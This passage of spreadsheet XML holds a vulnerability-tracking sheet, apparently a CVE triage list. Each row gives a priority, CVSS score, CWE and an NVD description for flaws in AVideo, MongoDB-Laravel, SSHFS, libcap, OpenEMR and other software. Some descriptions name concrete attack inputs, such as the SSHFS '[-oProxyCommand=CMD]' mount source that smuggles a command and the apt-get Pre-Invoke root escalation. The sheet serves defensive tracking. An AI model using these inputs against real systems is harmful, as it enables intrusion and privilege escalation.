          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3346" s="5" t="inlineStr"/>
      <c r="K3346" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3346" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the embedded-document relation handling of the MongoDB integration for Laravel can cause a caller-supplied embedded record identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence such an identifier may delete all embedded documents in a targeted record or overwrite an embedded document other than the intended target.</t>
        </is>
      </c>
      <c r="M3346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88027</t>
        </is>
      </c>
    </row>
    <row r="3347">
      <c r="A3347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88028</t>
        </is>
      </c>
      <c r="C3347" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3347" s="5" t="inlineStr"/>
      <c r="F3347" s="5" t="inlineStr"/>
      <c r="G3347" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3347" s="5" t="inlineStr"/>
      <c r="I3347" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3347" s="5" t="inlineStr"/>
      <c r="K3347" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L3347" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the polymorphic relation handling of the MongoDB integration for Laravel can cause a caller-supplied relation identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence a stored relation identifier may cause an affected application to return a document other than the intended relation target.</t>
        </is>
      </c>
      <c r="M3347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88028</t>
        </is>
      </c>
    </row>
    <row r="3348">
      <c r="A3348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88870</t>
        </is>
      </c>
      <c r="C3348" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3348" s="5" t="inlineStr"/>
      <c r="F3348" s="5" t="inlineStr"/>
      <c r="G3348" s="5" t="inlineStr"/>
      <c r="H3348" s="5" t="inlineStr"/>
      <c r="I3348" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3348" s="5" t="inlineStr"/>
      <c r="K3348" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3348" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in the LoginControl plugin PGP key endpoints that lack CSRF token validation. Attackers can craft malicious pages with image tags pointing to savePublicKey.json.php to replace a logged-in victim's PGP 2FA public key, causing lockout or enabling account takeover if the attacker knows the password.</t>
        </is>
      </c>
      <c r="M3348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88870</t>
        </is>
      </c>
    </row>
    <row r="3349">
      <c r="A3349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88872</t>
        </is>
      </c>
      <c r="C3349" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3349" s="5" t="inlineStr"/>
      <c r="F3349" s="5" t="inlineStr"/>
      <c r="G3349" s="5" t="inlineStr"/>
      <c r="H3349" s="5" t="inlineStr"/>
      <c r="I3349" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3349" s="5" t="inlineStr"/>
      <c r="K3349" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3349" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in the setPassword.json.php endpoint that allows unauthenticated attackers to modify any user's channel password by sending a GET request. Attackers can craft a malicious webpage that, when visited by an authenticated administrator, sets or clears any user's channel password without CSRF token validation.</t>
        </is>
      </c>
      <c r="M3349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88872</t>
        </is>
      </c>
    </row>
    <row r="3350">
      <c r="A3350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88873</t>
        </is>
      </c>
      <c r="C3350" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3350" s="5" t="inlineStr"/>
      <c r="F3350" s="5" t="inlineStr"/>
      <c r="G3350" s="5" t="inlineStr"/>
      <c r="H3350" s="5" t="inlineStr"/>
      <c r="I3350" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3350" s="5" t="inlineStr"/>
      <c r="K3350" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3350" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in view/logArchive.json.php that allows unauthenticated attackers to archive application logs by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrators' browsers to request the endpoint, copying sensitive application logs to a publicly accessible zip file and truncating the live log to remove forensic evidence.</t>
        </is>
      </c>
      <c r="M3350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88873</t>
        </is>
      </c>
    </row>
    <row r="3351">
      <c r="A3351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88898</t>
        </is>
      </c>
      <c r="C3351" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3351" s="5" t="inlineStr"/>
      <c r="F3351" s="5" t="inlineStr"/>
      <c r="G3351" s="5" t="inlineStr"/>
      <c r="H3351" s="5" t="inlineStr"/>
      <c r="I3351" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3351" s="5" t="inlineStr"/>
      <c r="K3351" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3351" s="5" t="inlineStr">
        <is>
          <t>AppFlowy-Cloud versions 0.7.2 through 0.9.64 fail to authorize callers against the workspace in the bulk publish endpoint path, allowing authenticated users to publish content into other tenants' namespaces. Attackers can write published views with attacker-controlled title, body and metadata into victim workspaces to deface public pages or host phishing content on trusted URLs.</t>
        </is>
      </c>
      <c r="M3351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88898</t>
        </is>
      </c>
    </row>
    <row r="3352">
      <c r="A3352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88915</t>
        </is>
      </c>
      <c r="C3352" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3352" s="5" t="inlineStr"/>
      <c r="F3352" s="5" t="inlineStr"/>
      <c r="G3352" s="5" t="inlineStr"/>
      <c r="H3352" s="5" t="inlineStr"/>
      <c r="I3352" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3352" s="5" t="inlineStr"/>
      <c r="K3352" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3352" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP do not consistently enforce the acting user's authorization when instantiating event templates.
For templates using distribution = 4, the template can specify a sharing_group_id. The instantiation path passed that value into event creation without verifying that the user instantiating the template was actually permitted to use the selected sharing group. The commit notes that Event::_add() only performed its own sharing-group authorization in another code path, leaving template instantiation able to write the identifier directly.
The same instantiation path also attached template-specified tags without checking the user's normal tagging permissions. In addition, it hardcoded local =&gt; 0, meaning tags marked local_only could be attached globally and consequently propagate through synchronization or export, contrary to their intended restriction.
The fix adds explicit SharingGroup::canUse() authorization for the acting user, applies the same tag-modification checks used by normal event tagging, and ensures local_only tags are attached locally.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88915</t>
        </is>
      </c>
    </row>
    <row r="3353">
      <c r="A3353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88938</t>
        </is>
      </c>
      <c r="C3353" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3353" s="5" t="inlineStr"/>
      <c r="F3353" s="5" t="inlineStr"/>
      <c r="G3353" s="5" t="inlineStr"/>
      <c r="H3353" s="5" t="inlineStr"/>
      <c r="I3353" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3353" s="5" t="inlineStr"/>
      <c r="K3353" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3353" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 fails to confine the path argument of the code.find MCP tool to the project root, allowing AI agent sessions to read source files anywhere on the host. Attackers can supply absolute paths or relative traversal sequences to the path argument and retrieve full file contents from outside the intended project directory.</t>
        </is>
      </c>
      <c r="M3353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88938</t>
        </is>
      </c>
    </row>
    <row r="3354">
      <c r="A3354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89011</t>
        </is>
      </c>
      <c r="C3354" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3354" s="5" t="inlineStr"/>
      <c r="F3354" s="5" t="inlineStr"/>
      <c r="G3354" s="5" t="inlineStr"/>
      <c r="H3354" s="5" t="inlineStr"/>
      <c r="I3354" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3354" s="5" t="inlineStr"/>
      <c r="K3354" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3354" s="5" t="inlineStr">
        <is>
          <t>isomorphic-git before 1.42.0 contains a prototype pollution vulnerability in the getRemoteInfo function that allows a malicious Git server operator to pollute Object.prototype by advertising crafted ref names containing '__proto__' path segments during ref negotiation. Attackers controlling a Git server can advertise a specially crafted ref such as '__proto__/corsProxy' to reroute all subsequent network operations through an attacker-controlled proxy, causing isomorphic-git to invoke the victim's onAuth callback and transmit credentials to the attacker when the victim calls getRemoteInfo with an attacker-supplied URL.</t>
        </is>
      </c>
      <c r="M3354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89011</t>
        </is>
      </c>
    </row>
    <row r="3355">
      <c r="A3355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89245</t>
        </is>
      </c>
      <c r="C3355" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3355" s="5" t="inlineStr"/>
      <c r="F3355" s="5" t="inlineStr"/>
      <c r="G3355" s="5" t="inlineStr"/>
      <c r="H3355" s="5" t="inlineStr"/>
      <c r="I3355" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3355" s="5" t="inlineStr"/>
      <c r="K3355" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3355" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in playlistRemove.php that allows attackers to delete playlists by skipping CSRF protection checks. Attackers can craft a malicious form that submits a POST request to playlistRemove.php, causing a victim's playlist to be deleted when they visit the attacker's page while logged in.</t>
        </is>
      </c>
      <c r="M3355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89245</t>
        </is>
      </c>
    </row>
    <row r="3356">
      <c r="A3356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89251</t>
        </is>
      </c>
      <c r="C3356" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3356" s="5" t="inlineStr"/>
      <c r="F3356" s="5" t="inlineStr"/>
      <c r="G3356" s="5" t="inlineStr"/>
      <c r="H3356" s="5" t="inlineStr"/>
      <c r="I3356" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3356" s="5" t="inlineStr"/>
      <c r="K3356" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3356" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ad impressions in plugin/AD_Server/log.php, allowing logged-in users to submit arbitrary label values that trigger unverified wallet credits to campaign video owners. Attackers can repeatedly POST label=start requests to mint YPTWallet balance for any campaign video without proof an ad actually played.</t>
        </is>
      </c>
      <c r="M3356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89251</t>
        </is>
      </c>
    </row>
    <row r="3357">
      <c r="A3357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89252</t>
        </is>
      </c>
      <c r="C3357" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3357" s="5" t="inlineStr"/>
      <c r="F3357" s="5" t="inlineStr"/>
      <c r="G3357" s="5" t="inlineStr"/>
      <c r="H3357" s="5" t="inlineStr"/>
      <c r="I3357" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3357" s="5" t="inlineStr"/>
      <c r="K3357" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3357" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to verify ownership in addLiveLink.php when updating LiveLinks, allowing authenticated users to modify other users' links. A canStream user can overwrite another user's LiveLink HLS source and metadata by supplying an existing linkId, redirecting viewers to attacker-controlled media.</t>
        </is>
      </c>
      <c r="M3357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89252</t>
        </is>
      </c>
    </row>
    <row r="3358">
      <c r="A3358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9331</t>
        </is>
      </c>
      <c r="C3358" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3358" s="5" t="inlineStr"/>
      <c r="F3358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3358" s="5" t="inlineStr"/>
      <c r="H3358" s="5" t="inlineStr"/>
      <c r="I3358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3358" s="5" t="inlineStr"/>
      <c r="K3358" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3358" s="5" t="inlineStr">
        <is>
          <t>The EDD Product Catalog Feed by PixelYourSite plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the wpeddpcf_delete_feed function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.</t>
        </is>
      </c>
      <c r="M3358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t>
        </is>
      </c>
    </row>
    <row r="3359">
      <c r="A3359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3359" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48564</t>
        </is>
      </c>
      <c r="C3359" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3359" s="5" t="inlineStr"/>
      <c r="F3359" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3359" s="5" t="inlineStr"/>
      <c r="H3359" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I3359" s="5" t="inlineStr">
        <is>
          <t>2025-12-08</t>
        </is>
      </c>
      <c r="J3359" s="5" t="inlineStr"/>
      <c r="K3359" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3359" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible intent filter bypass due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M3359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48564</t>
        </is>
      </c>
    </row>
    <row r="3360">
      <c r="A3360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15419</t>
        </is>
      </c>
      <c r="C3360" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3360" s="5" t="inlineStr"/>
      <c r="F3360" s="5" t="inlineStr"/>
      <c r="G3360" s="5" t="inlineStr"/>
      <c r="H3360" s="5" t="inlineStr"/>
      <c r="I3360" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3360" s="5" t="inlineStr"/>
      <c r="K3360" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3360" s="5" t="inlineStr">
        <is>
          <t>In the silabser.sys driver for CP210x devices v11.5.0 and earlier, a local unprivileged user with a malicious device can use malformed packets to corrupt kernel pool memory, resulting in arbitrary code execution with escalated privileges.</t>
        </is>
      </c>
      <c r="M3360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15419</t>
        </is>
      </c>
    </row>
    <row r="3361">
      <c r="A3361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34789</t>
        </is>
      </c>
      <c r="C3361" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3361" s="5" t="inlineStr"/>
      <c r="F3361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3361" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3361" s="5" t="inlineStr"/>
      <c r="I3361" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3361" s="5" t="inlineStr"/>
      <c r="K3361" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3361" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, src/App/PropertyPythonObject.cpp in PropertyPythonObject::Restore() passes the attacker-controlled module attribute from serialized PropertyPythonObject XML directly to PyImport_ImportModule() while restoring a crafted FCStd document, which executes module-level Python code, and the legacy pickle branch also imports an attacker-controlled module and invokes its class constructor through PyObject_CallObject(). This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M3361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34789</t>
        </is>
      </c>
    </row>
    <row r="3362">
      <c r="A3362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40506</t>
        </is>
      </c>
      <c r="C3362" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3362" s="5" t="inlineStr"/>
      <c r="F3362" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3362" s="5" t="inlineStr"/>
      <c r="H3362" s="5" t="inlineStr"/>
      <c r="I3362" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3362" s="5" t="inlineStr"/>
      <c r="K3362" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3362" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.2.0 contains a path traversal vulnerability in the standard_tables_manage.php interface where the db GET parameter is passed without validation to temp_dir_cleanup(), which joins the value to the PHP temporary directory path and recursively deletes the resulting directory. Attackers can supply a traversal sequence in the db parameter to resolve outside the intended temporary directory, and by chaining this with an open redirect in dicom_frame.php, an unauthenticated attacker can deliver a crafted URL that triggers arbitrary recursive directory deletion within an authenticated Superuser's session.</t>
        </is>
      </c>
      <c r="M3362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40506</t>
        </is>
      </c>
    </row>
    <row r="3363">
      <c r="A3363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48711</t>
        </is>
      </c>
      <c r="C3363" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3363" s="5" t="inlineStr"/>
      <c r="F3363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3363" s="5" t="inlineStr"/>
      <c r="H3363" s="5" t="inlineStr"/>
      <c r="I3363" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3363" s="5" t="inlineStr"/>
      <c r="K3363" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3363" s="5" t="inlineStr">
        <is>
          <t>SSHFS is a network filesystem client for connecting to SSH servers. From version 1.4 until 3.7.6, SSHFS accepts a bracketed mount source such as [-oProxyCommand=CMD]:/path and find_base_path() removes the brackets, leaving a host value that begins with - and is passed directly to ssh as a command-line argument. When a caller also supplies a path-valued sftp_server, ssh treats the normalized host as an option and the server path as its destination, causing an injected ProxyCommand to execute locally before any connection or authentication succeeds. The attack requires a caller or wrapper that passes an attacker-controlled mount source to SSHFS with the required sftp_server configuration and results in arbitrary command execution as the user running SSHFS. This issue is fixed in version 3.7.6.</t>
        </is>
      </c>
      <c r="M3363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48711</t>
        </is>
      </c>
    </row>
    <row r="3364">
      <c r="A3364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4878</t>
        </is>
      </c>
      <c r="C3364" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3364" s="5" t="inlineStr"/>
      <c r="F3364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3364" s="5" t="inlineStr"/>
      <c r="H3364" s="5" t="inlineStr">
        <is>
          <t>libcap_project:libcap, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I3364" s="5" t="inlineStr">
        <is>
          <t>2026-04-09</t>
        </is>
      </c>
      <c r="J3364" s="5" t="inlineStr"/>
      <c r="K3364" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3364" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libcap. A local unprivileged user can exploit a Time-of-check-to-time-of-use (TOCTOU) race condition in the `cap_set_file()` function. This allows an attacker with write access to a parent directory to redirect file capability updates to an attacker-controlled file. By doing so, capabilities can be injected into or stripped from unintended executables, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="M3364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4878</t>
        </is>
      </c>
    </row>
    <row r="3365">
      <c r="A3365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="C3365" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3365" s="5" t="inlineStr"/>
      <c r="F3365" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3365" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3365" s="5" t="inlineStr"/>
      <c r="I3365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3365" s="5" t="inlineStr"/>
      <c r="K3365" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3365" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="3366">
      <c r="A3366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52817</t>
        </is>
      </c>
      <c r="C3366" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3366" s="5" t="inlineStr"/>
      <c r="F3366" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3366" s="5" t="inlineStr"/>
      <c r="H3366" s="5" t="inlineStr"/>
      <c r="I3366" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3366" s="5" t="inlineStr"/>
      <c r="K3366" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3366" s="5" t="inlineStr">
        <is>
          <t>Linuxfabrik Monitoring Plugins provides monitoring plugins for Icinga, Nagios, and related systems. Prior to version 5.1.0, the shipped assets/sudoers/Debian.sudoers policy allowed the nagios or icinga account to execute /usr/bin/apt-get as root without restricting its arguments. An attacker who already controls that monitoring account can supply the APT::Update::Pre-Invoke option to execute an arbitrary command while apt-get runs with root privileges, resulting in a root shell and complete compromise of the host. The vulnerable rule supports the check-plugins/deb-updates/deb-updates plugin, but it authorized arbitrary apt-get argument sequences rather than only the required apt-get update --quiet 2 command. This issue is fixed in version 5.1.0.</t>
        </is>
      </c>
      <c r="M3366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52817</t>
        </is>
      </c>
    </row>
    <row r="3367">
      <c r="A3367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54467</t>
        </is>
      </c>
      <c r="C3367" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3367" s="5" t="inlineStr"/>
      <c r="F3367" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3367" s="5" t="inlineStr"/>
      <c r="H3367" s="5" t="inlineStr"/>
      <c r="I3367" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3367" s="5" t="inlineStr"/>
